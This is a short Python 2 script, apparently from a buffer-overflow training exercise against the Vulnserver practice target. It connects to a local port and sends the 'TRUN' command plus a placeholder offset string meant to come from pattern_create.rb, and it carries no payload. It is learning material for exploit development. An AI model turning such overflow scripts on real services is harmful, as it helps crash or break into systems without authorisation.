#!/usr/bin/python
import sys, socket

offset = "" # This would be generated by the pattern_create.rb module
address = '127.0.0.1' #CHANGE THIS
port = 9999 # CHANGE THIS
vulncommand = 'TRUN /.:/' # CHANGE THIS, the vulnerable command that was found in the spiking section would go here

try:
	s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
	s.connect((address,port))

	s.send((vulncommand + offset))
	s.close()

except:
	print "Error connecting to server"
	sys.exit()
